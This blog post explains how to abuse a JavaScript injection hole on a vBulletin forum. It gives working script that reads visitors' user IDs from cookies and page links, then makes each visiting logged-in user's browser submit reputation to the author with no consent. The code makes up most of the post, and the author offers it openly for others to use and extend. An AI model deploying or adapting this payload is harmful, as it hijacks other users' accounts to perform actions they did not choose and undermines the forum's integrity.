Fun with JavaScript injection.
UPDATE: Now that I’ve patched the exploit, you might no longer be able to inject your code. So in this post I’ll just assume that you’ve found your way to inject code and are curious as to what you can do now.
Now that we can inject JavaScript into our posts, why not have some fun with it?
How about we make some users give us some reputation? I wrote some functions which make this quite easy.
This is only a part of a class I wrote, and I’m not going to post it all (as of now).
```javascript
this.getUserId = function()
{
    // Check the vBulletin cookie first
    var vbcookie = readCookie(COOKIE_PREFIX + 'userid'); // COOKIE_PREFIX is a placeholder; you need to find out the prefix by yourself.
    if (vbcookie !== null)
        return parseInt(vbcookie);

    // Check for our own custom cookie
    var userid = readCookie('_u');
    if (userid !== null)
        return parseInt(userid);

    // We are on a page without the user CP tools menu, so there is nothing to parse.
    if (!document.getElementById('usercptools_menu'))
        return 0;

    // Fall back to parsing the user's own profile link out of the tools menu.
    var links = document.getElementById('usercptools_menu').getElementsByTagName('a');
    var total = links.length;
    for (var i = 0; i < total; i++)
    {
        var result = links[i].href.match(/member\.php\?u=(\d+)/);
        if (result && result[1])
        {
            createCookie('_u', result[1], 365); // Cookie for faster and safer access next time.
            return parseInt(result[1]);
        }
    }
    return 0;
}
```
This code attempts to get the current user’s ID whenever possible, so we can filter the users. Meaning we can decide which users we want to “attack”.
The cookie functions I’m using can be found here.
So, now that we can choose the affected users, let’s make them “rep” us. I’m not going to explain the whole code. If you understand it, you’ll see what changes you’re going to have to make. Otherwise you probably shouldn’t be reading this blog in the first place.
```javascript
var id; // Reputation entry id, shared between the onload handler and submit_Rep().

window.onload = function()
{
    var userid = this.getUserId();
    // Only act on logged-in users who are not in our exclusion list.
    if (userid != 0 && [array, of, ids].indexOf(userid) == -1)
    {
        var rep = document.getElementsByTagName('a');
        var images;
        for (var r = 0; r < rep.length; r++)
        {
            // Look for the reputation link that belongs to our own post.
            if (rep[r].href && rep[r].href.indexOf('reputation.php') != -1)
            {
                images = rep[r].getElementsByTagName('img');
                if (images && images[0] && images[0].title && images[0].title.indexOf('Add to XXXXX\'s R') != -1)
                {
                    id = rep[r].id.substr(rep[r].id.lastIndexOf("_") + 1);
                    var A = vBrep.reps[id];
                    // Open the reputation popup menu the same way a click would.
                    if (A.vbmenu == null)
                        A.populate();
                    else
                    {
                        if (vBmenu.activemenu != A.vbmenuname)
                            A.vbmenu.show(fetch_object(A.vbmenuname));
                        else
                            A.vbmenu.hide();
                    }
                    window.setTimeout('submit_Rep()', 1000);
                    break;
                }
            }
        }
        delete rep;
    }
}

function submit_Rep()
{
    var reason = document.getElementsByName('reason');
    // The popup form may not be in the DOM yet; poll until it is.
    if (!reason || !reason[0])
        return window.setTimeout('submit_Rep()', 1000);
    reason[0].value = 'Message goes here';
    var A = vBrep.reps[id];
    A.submit();
}
```
This will make users “rep” you, whether they want to or not. They will probably get annoyed, though, because this will attempt to give reputation every time they open one of the threads you replied to. We could easily set a cookie to only make them rep you once a week or something. But I’ll leave that up to you. I’ve done the most difficult part for you already.
Happy experimenting.